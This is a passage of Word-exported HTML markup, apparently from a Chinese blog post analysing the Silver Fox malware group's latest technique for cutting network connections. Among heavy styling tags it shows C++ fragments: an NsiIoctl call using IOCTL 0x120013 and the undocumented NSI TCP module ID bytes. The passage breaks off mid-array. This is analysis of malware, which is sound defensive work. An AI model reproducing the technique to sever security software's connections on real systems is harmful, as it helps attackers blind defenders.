&#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pInputBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">InputBufferSize </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> cbInputBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">MetricBuffer </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pMetricBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">MetricBufferSize </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> cbMetricBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NsiIoctl</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x120013,</span><span style="mso-spacerun:yes;"><span leaf="">               </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// IOCTL code</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">params,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">params,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">cbReturned,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Undocumented TCP module ID for NSI (24 bytes)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">BYTE NPI_MS_TCP_MODULEID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[]</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x18, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x01, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x03, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x4A, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xEB, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x1A, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x9B, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xD4, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x11,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x91, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x23, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x50, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x04, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: 